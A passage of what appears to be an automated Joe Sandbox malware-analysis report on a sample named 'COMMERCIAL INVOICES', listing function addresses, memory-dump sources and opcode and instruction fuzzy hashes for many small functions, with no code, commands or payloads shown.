                                                                                                                                                                                                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                                                                      • Instruction ID: a971abbd22f23d1517dbd58f000863e4229007b94ac756825803565ae2ab1c9e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7701C0B2525B229BCB218F199C40A367BA5EB95B607008A3DFED5CB681D731D810CBA0
                                                                                                                                                                                                                                      Function 01314940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a50835a5f042b68b2a439265d669f2e9da57a942df0ff2526b874284ab7ce8c9
                                                                                                                                                                                                                                      • Instruction ID: b2ff2fe99c86f71717fc2e7f6282c279361b51f318c9a7c3d4c07dad2b13e89e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a50835a5f042b68b2a439265d669f2e9da57a942df0ff2526b874284ab7ce8c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3014572451201DFC33ADF1CD840E22BBAAEB81378B254225E9A89B1EAD730DC01CBD0
                                                                                                                                                                                                                                      Function 012BE1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 896935a767bea37ea1b8ed6ba7a5bdab0c595a277da85d5ce241de4087ec48f1
                                                                                                                                                                                                                                      • Instruction ID: fafa5c76fa235ce283454b90843d6f7e5c542c8e7c7cd6ec1319da95a108d2be
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 896935a767bea37ea1b8ed6ba7a5bdab0c595a277da85d5ce241de4087ec48f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B411A132251241EFDB15EF19CD81FA67BB8FF94B94F250065EA059B6A1C235ED01CA90
                                                                                                                                                                                                                                      Function 01246259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ff7496281f4484e8d3485851c389af3821099dd723a416a3e3c9dbf879e52db3
                                                                                                                                                                                                                                      • Instruction ID: 638eae6b665026034fcea46d3cdf9acc900f47c35c9b414aab8bc197659761c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff7496281f4484e8d3485851c389af3821099dd723a416a3e3c9dbf879e52db3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8117C71652229ABEB29EB64CC42FE9B3B4BF14710F5081D5A318A61E0DB709E81CF84
                                                                                                                                                                                                                                      Function 012C6050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bd9a79d3198ec90e31a6fd94a8d9356ea51e8e16f594887f1637ce5673f472c5
                                                                                                                                                                                                                                      • Instruction ID: 08aa21010eb0db2255c4579af94416b4472cf811dcd04e48db1a8fde69fb10b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd9a79d3198ec90e31a6fd94a8d9356ea51e8e16f594887f1637ce5673f472c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3111772910019ABCB12DB94CC84DEFBB7CEF48254F044166AA06A7211EA34AA15CBA0
                                                                                                                                                                                                                                      Function 0124208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                      • Instruction ID: 003c960e9047571d55a5bc0e8748f62c2998ffcd338791546ffdb1cc7423dddf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0301F532220102CBDF199A1EE880BA27BA6BFE4700F1550A5FE01CF246DAB1C881C390
                                                                                                                                                                                                                                      Function 012D6500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 559a0270b2bc01a644cb7579890e1a1f88657e67b55924eb29530bd3fe7f2aa5
                                                                                                                                                                                                                                      • Instruction ID: 5d587a1855960b980b925cb38f5052085f10f6bb9ac55e61ac4ad08f41cfc661
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 559a0270b2bc01a644cb7579890e1a1f88657e67b55924eb29530bd3fe7f2aa5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 701104326101469FC311CF58E800BA6BBB9FF5A304F488159E948CB315D732EC80CBA0
                                                                                                                                                                                                                                      Function 012CC810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 34297a021da1dfbe10de3f95b1cbbc7caf8adb8b7b30dc0ba3d4bea8fe8f2e13
                                                                                                                                                                                                                                      • Instruction ID: 06066e47c905cf351b2aba94e55ac469a511f2bc27a024c850667ae4668b3268
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34297a021da1dfbe10de3f95b1cbbc7caf8adb8b7b30dc0ba3d4bea8fe8f2e13
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 981118B1A1120A9BCB00DFA9D581AAEBBF8FF58750F10406AB905E7351D674EA018BA4
                                                                                                                                                                                                                                      Function 012EEA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f8b8000a506e6d0973383f8b8718a0bf5019b0114bbbd6476eb15eb3b167fc27
                                                                                                                                                                                                                                      • Instruction ID: c632262e6f9d97b9fabe168ff077168243f52503ea09ae33a4f79d1a95f2b332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8b8000a506e6d0973383f8b8718a0bf5019b0114bbbd6476eb15eb3b167fc27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A901F131060212DBC732AE19848897ABBE9FF92694B86842EE6021B340CB319C41CB91
                                                                                                                                                                                                                                      Function 0123C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                      • Instruction ID: fda250cbb6245d64a0cc573474d2ed3044ee90f3dc2a11b8496ef029f794ce21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3701DD7222074A9FDF22D66ED440F77B7E9FFC5654F04441AE69687540DE70E441C750
                                                                                                                                                                                                                                      Function 012820F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dc75ea870bd8e2e94c0416522dac3a6872be51f8340c299e852986c9a8fd7d33
                                                                                                                                                                                                                                      • Instruction ID: 783d95827cdf7df7330d7a5bb4e01af9cf6fcbfa75d4f4b1e698882fcaf1aa05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc75ea870bd8e2e94c0416522dac3a6872be51f8340c299e852986c9a8fd7d33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD116D75A2224EEBCB05EFA4C851FAE7BB9FB44780F104059FA0597290E635EE11CB90
                                                                                                                                                                                                                                      Function 0127E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f2c87c4a098f2a34cb83f2fd6aa5656c03320068f0a45c38c8f1e39b011ee6e2
                                                                                                                                                                                                                                      • Instruction ID: f541186f00586ebb2af5b237c072a8c78c750de90fd7e06c8648bbe2636677b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c87c4a098f2a34cb83f2fd6aa5656c03320068f0a45c38c8f1e39b011ee6e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A01D4B1220502FFC751AB29CDC0E63BBACFB997947000525F60587590DB34EC41C6A0
                                                                                                                                                                                                                                      Function 012D69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 86dee36e04ba9c3e0df1ec518758aa0cde7bf227105f0e1d92feca2dbbd89437
                                                                                                                                                                                                                                      • Instruction ID: c0c680dd0dadc2b9995792c42b3a91d5798fc0fc132d83787579e728a50086dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86dee36e04ba9c3e0df1ec518758aa0cde7bf227105f0e1d92feca2dbbd89437
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0401D8322352129BC320EF69C8899A6BBA8FF58660F214129F999871C0E734D905C7D2
                                                                                                                                                                                                                                      Function 012CC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4a7e60a65f0bc87eaa6d49681967b1dbd3ee23a78bf96aec0cc0278ca75d9a0f
                                                                                                                                                                                                                                      • Instruction ID: 89973c2887cc5117f1a6c4dbdd437d4200640dd6908ed40cfe97bca018c937a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a7e60a65f0bc87eaa6d49681967b1dbd3ee23a78bf96aec0cc0278ca75d9a0f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C116175A1124DEBDB15EF64C851EBEBBB5FB48750F008159FE0597380DA34D911CB90
                                                                                                                                                                                                                                      Function 012CC97C Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 36b5fa13ae0248c6fc079ce98dde58d7003dcb75e347cd4443c0a41a0759c5ca
                                                                                                                                                                                                                                      • Instruction ID: 0e6bdbb05e66a2ffa869041d0c7b7fe3dc780ef40abf58ea7381c14dec762690
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b5fa13ae0248c6fc079ce98dde58d7003dcb75e347cd4443c0a41a0759c5ca
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD117CB16153459FC700DF69C44299BBBE8FF98710F00451EBA98D7390E630E900CB96
                                                                                                                                                                                                                                      Function 012CCA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b2f8ba5034f52f5af3049ba0c0d074751124f859acdb2cf53ad088a0c978dadd
                                                                                                                                                                                                                                      • Instruction ID: a3e32ccb7d5884cb162d1a990febf98efce6d657178c4b9eda554959a3a24e03
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2f8ba5034f52f5af3049ba0c0d074751124f859acdb2cf53ad088a0c978dadd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68117C716153059FC300DF6DC44195BBBE8FF99750F00451EBA58D7390E630E900CB96
                                                                                                                                                                                                                                      Function 0125E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                      • Instruction ID: cfb36cf2f2ee8a3058e033ea594d727311f7392fcfd12a782e0201fb0dc517ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14017C32225581DFEB228B1DC988F36BBE8EF44794F0A04A5FE05DB691D678DD80C625
                                                                                                                                                                                                                                      Function 0123826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 50be1ec1cdb4db59782a0b61608bcb37e1ffe034edb430b21d935799958ccf15
                                                                                                                                                                                                                                      • Instruction ID: 64a7d6f3dbbafbfad8012b7b048fb0a4ec173e031baa1ee1ce5608ddc5606846
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50be1ec1cdb4db59782a0b61608bcb37e1ffe034edb430b21d935799958ccf15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F01DF71730646DBD714EB6AD8019BEB7B8EFC0624F158229AA01AB284EE30D801C690
                                                                                                                                                                                                                                      Function 012EEB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: db27041708b8d37872381e9f94ef80b5ec51b97fde3d07ab253ead47cf9208ce
                                                                                                                                                                                                                                      • Instruction ID: c3504e6f53a8d3bd22f6e78501ae6dcf63b1945bd9051814457dc9fa68df07fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db27041708b8d37872381e9f94ef80b5ec51b97fde3d07ab253ead47cf9208ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7701F2B12A0701EFD7325F19D841F52BAE8EF55B50F01442EB7069F390E6B19841CB58
                                                                                                                                                                                                                                      Function 01242582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 29e89a07e581c230ec85c95a703da3ecc67d10c7ebcb6a1e34dea332b155716c
                                                                                                                                                                                                                                      • Instruction ID: 844ef199115a2ee301620eea39099c141d62c6bf674a7ebe3532c640185ecfe2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29e89a07e581c230ec85c95a703da3ecc67d10c7ebcb6a1e34dea332b155716c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27F0F932661611B7C735DF5B9D40F17BEA9EB84B90F004029F60597600D630ED01CBE0
                                                                                                                                                                                                                                      Function 0126C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                      • Instruction ID: c03ea522f7ada2b482c7dd6f41493a61e3b0914eb6af39f6026f230b14ece756
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F0C2B2600611ABD325DF4DDC40E67FBEEDBD1A80F048128A645C7260EA31ED05CB90
                                                                                                                                                                                                                                      Function 0123C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                      • Instruction ID: 87a22e5c2f1955a83b2c754d17f6f2e75835c0150a7c9f9689ff083e74be4bc3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0FCB32746239BD732575D4840B3BA6958FD1B64F190037E705BB200CDB08D1157D1
                                                                                                                                                                                                                                      Function 0131634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0e8eaffee2560263ed62e2d84a2813020ee2ceaee735752b59c770ed31b53cf4
                                                                                                                                                                                                                                      • Instruction ID: 58c4c1ffa07f03b40add7a8df7bc3c97770c0673970dfe5285bfe41ca4d129c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e8eaffee2560263ed62e2d84a2813020ee2ceaee735752b59c770ed31b53cf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B018FB1A1020EEFCB04DFA9D841AAEB7F8FF58304F10402AF900E7390D674DA018BA4
                                                                                                                                                                                                                                      Function 0131625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 29425a8219702be301a7f6be5b6f8a1908ee233d7d8e5c54645a4fb96096c212
                                                                                                                                                                                                                                      • Instruction ID: 9154876e6cd358a1a4e1707c6d5e27b4ebecf6762fb4fce635a8336c8f17e1ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29425a8219702be301a7f6be5b6f8a1908ee233d7d8e5c54645a4fb96096c212
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94017171A1120AABCB04EFA9D441AAEB7F8FF58304F10401AF900E7390D674D9018BA4
                                                                                                                                                                                                                                      Function 013162D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
